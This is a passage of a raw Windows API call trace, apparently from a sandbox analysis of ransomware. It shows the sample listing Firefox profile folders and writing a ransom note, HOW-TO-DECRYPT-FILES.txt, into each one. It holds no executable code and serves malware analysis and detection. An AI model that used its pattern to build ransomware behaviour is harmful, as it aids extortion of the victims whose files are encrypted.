lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing", lpFilePart=0x0) returned 0x55 [0049.500] GetLastError () returned 0x0 [0049.500] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.500] GetLastError () returned 0x0 [0049.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.500] GetLastError () returned 0x0 [0049.501] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing", lpFilePart=0x0) returned 0x55 [0049.501] GetLastError () returned 0x0 [0049.501] SetErrorMode (uMode=0x1) returned 0x0 [0049.501] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.503] GetLastError () returned 0x0 [0049.503] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.503] GetLastError () returned 0x0 [0049.503] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.503] GetLastError () returned 0x0 [0049.503] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.503] GetLastError () returned 0x0 [0049.503] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.503] GetLastError () returned 0x0 [0049.503] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.503] GetLastError () returned 0x0 [0049.503] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.503] GetLastError () returned 0x0 [0049.503] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.503] GetLastError () returned 0x0 [0049.503] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.503] GetLastError () returned 0x12 [0049.503] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.505] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.506] GetLastError () returned 0x12 [0049.506] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.506] GetLastError () returned 0x12 [0049.506] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.506] GetLastError () returned 0x12 [0049.506] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.506] GetLastError () returned 0x12 [0049.506] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.506] GetLastError () returned 0x12 [0049.506] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.506] GetLastError () returned 0x12 [0049.506] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.506] GetLastError () returned 0x12 [0049.506] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.506] GetLastError () returned 0x12 [0049.506] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.506] GetLastError () returned 0x12 [0049.506] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.507] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\test-malware-simple.cache"), fInfoLevelId=0x0, lpFileInformation=0x1d01690 | out: lpFileInformation=0x1d01690*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5b7700, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xb5b7700, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xb5b7700, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x2c)) returned 1 [0049.509] GetLastError () returned 0x12 [0049.509] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.509] GetLastError () returned 0x0 [0049.509] GetFileType (hFile=0x184) returned 0x1 [0049.509] GetFileType (hFile=0x184) returned 0x1 [0049.509] WriteFile (in: hFile=0x184, lpBuffer=0x1d1d380*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb10, lpOverlapped=0x0 | out: lpBuffer=0x1d1d380*, lpNumberOfBytesWritten=0x18eb10*=0x18da, lpOverlapped=0x0) returned 1 [0049.511] GetLastError () returned 0x0 [0049.511] CloseHandle (hObject=0x184) returned 1 [0049.511] GetLastError () returned 0x0 [0049.511] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6e [0049.511] GetLastError () returned 0x0 [0049.511] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.511] GetLastError () returned 0x0 [0049.511] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-malware-simple.pset", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-malware-simple.pset", lpFilePart=0x0) returned 0x6e [0049.511] GetLastError () returned 0x0 [0049.511] SetErrorMode (uMode=0x1) returned 0x0 [0049.511] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\test-malware-simple.pset"), fInfoLevelId=0x0, lpFileInformation=0x1d1f0ec | out: lpFileInformation=0x1d1f0ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4acd60, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xb4acd60, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xb5dd860, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x10)) returned 1 [0049.512] GetLastError () returned 0x0 [0049.514] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.514] GetLastError () returned 0x5 [0049.516] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-malware-simple.sbstore", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-malware-simple.sbstore", lpFilePart=0x0) returned 0x71 [0049.516] GetLastError () returned 0x5 [0049.517] SetErrorMode (uMode=0x1) returned 0x0 [0049.517] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\test-malware-simple.sbstore"), fInfoLevelId=0x0, lpFileInformation=0x1b3e710 | out: lpFileInformation=0x1b3e710*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4acd60, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xb4acd60, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xb4acd60, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0xe8)) returned 1 [0049.518] GetLastError () returned 0x5 [0049.519] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6e [0049.519] GetLastError () returned 0x5 [0049.519] SetErrorMode (uMode=0x1) returned 0x0 [0049.519] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.519] GetLastError () returned 0x5 [0049.521] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-phish-simple.cache", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-phish-simple.cache", lpFilePart=0x0) returned 0x6d [0049.521] GetLastError () returned 0x5 [0049.521] SetErrorMode (uMode=0x1) returned 0x0 [0049.521] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\test-phish-simple.cache"), fInfoLevelId=0x0, lpFileInformation=0x1b5c6f4 | out: lpFileInformation=0x1b5c6f4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb629b20, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xb629b20, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xb629b20, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x2c)) returned 1 [0049.522] GetLastError () returned 0x5 [0049.523] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6e [0049.523] GetLastError () returned 0x5 [0049.523] SetErrorMode (uMode=0x1) returned 0x0 [0049.523] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.523] GetLastError () returned 0x5 [0049.525] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-phish-simple.pset", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-phish-simple.pset", lpFilePart=0x0) returned 0x6c [0049.525] GetLastError () returned 0x5 [0049.525] SetErrorMode (uMode=0x1) returned 0x0 [0049.525] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\test-phish-simple.pset"), fInfoLevelId=0x0, lpFileInformation=0x1b7a940 | out: lpFileInformation=0x1b7a940*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4acd60, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xb4acd60, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xb64fc80, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x10)) returned 1 [0049.526] GetLastError () returned 0x5 [0049.526] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6e [0049.526] GetLastError () returned 0x5 [0049.526] SetErrorMode (uMode=0x1) returned 0x0 [0049.527] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.527] GetLastError () returned 0x5 [0049.529] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-phish-simple.sbstore", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-phish-simple.sbstore", lpFilePart=0x0) returned 0x6f [0049.529] GetLastError () returned 0x5 [0049.529] SetErrorMode (uMode=0x1) returned 0x0 [0049.529] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\test-phish-simple.sbstore"), fInfoLevelId=0x0, lpFileInformation=0x1b98b84 | out: lpFileInformation=0x1b98b84*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5dd860, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xb5dd860, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xb5dd860, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0xe8)) returned 1 [0049.529] GetLastError () returned 0x5 [0049.530] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6e [0049.530] GetLastError () returned 0x5 [0049.530] SetErrorMode (uMode=0x1) returned 0x0 [0049.530] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\safebrowsing\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\safebrowsing\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.531] GetLastError () returned 0x5 [0049.533] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache", lpFilePart=0x0) returned 0x55 [0049.533] GetLastError () returned 0x5 [0049.533] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.533] GetLastError () returned 0x5 [0049.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.533] GetLastError () returned 0x5 [0049.533] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache", lpFilePart=0x0) returned 0x55 [0049.533] GetLastError () returned 0x5 [0049.533] SetErrorMode (uMode=0x1) returned 0x0 [0049.533] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.534] GetLastError () returned 0x5 [0049.534] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.534] GetLastError () returned 0x5 [0049.534] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.534] GetLastError () returned 0x5 [0049.534] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.535] GetLastError () returned 0x12 [0049.535] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.535] GetLastError () returned 0x12 [0049.535] SetErrorMode (uMode=0x1) returned 0x0 [0049.535] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.535] GetLastError () returned 0x12 [0049.535] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.535] GetLastError () returned 0x12 [0049.535] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.535] GetLastError () returned 0x12 [0049.536] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.536] GetLastError () returned 0x12 [0049.536] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.536] GetLastError () returned 0x12 [0049.536] SetErrorMode (uMode=0x1) returned 0x0 [0049.536] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\startupcache\\startupcache.4.little"), fInfoLevelId=0x0, lpFileInformation=0x1bb87ec | out: lpFileInformation=0x1bb87ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd3fb7550, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xd3fb7550, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd404fad0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xfe04b)) returned 1 [0049.537] GetLastError () returned 0x12 [0049.537] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6e [0049.538] GetLastError () returned 0x12 [0049.538] SetErrorMode (uMode=0x1) returned 0x0 [0049.538] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\startupcache\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.538] GetLastError () returned 0x0 [0049.538] GetFileType (hFile=0x184) returned 0x1 [0049.538] GetFileType (hFile=0x184) returned 0x1 [0049.538] WriteFile (in: hFile=0x184, lpBuffer=0x1bd435c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb10, lpOverlapped=0x0 | out: lpBuffer=0x1bd435c*, lpNumberOfBytesWritten=0x18eb10*=0x18da, lpOverlapped=0x0) returned 1 [0049.539] GetLastError () returned 0x0 [0049.539] CloseHandle (hObject=0x184) returned 1 [0049.540] GetLastError () returned 0x0 [0049.540] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6e [0049.540] GetLastError () returned 0x0 [0049.540] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\startupCache\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.540] GetLastError () returned 0x0 [0049.540] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails", lpFilePart=0x0) returned 0x53 [0049.540] GetLastError () returned 0x0 [0049.540] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.540] GetLastError () returned 0x0 [0049.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.540] GetLastError () returned 0x0 [0049.540] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails", lpFilePart=0x0) returned 0x53 [0049.540] GetLastError () returned 0x0 [0049.540] SetErrorMode (uMode=0x1) returned 0x0 [0049.540] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.545] GetLastError () returned 0x0 [0049.545] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.546] GetLastError () returned 0x0 [0049.546] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.546] GetLastError () returned 0x0 [0049.546] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.546] GetLastError () returned 0x0 [0049.546] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.546] GetLastError () returned 0x0 [0049.546] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.546] GetLastError () returned 0x0 [0049.546] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.546] GetLastError () returned 0x0 [0049.547] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.547] GetLastError () returned 0x0 [0049.547] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.547] GetLastError () returned 0x12 [0049.547] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.548] GetLastError () 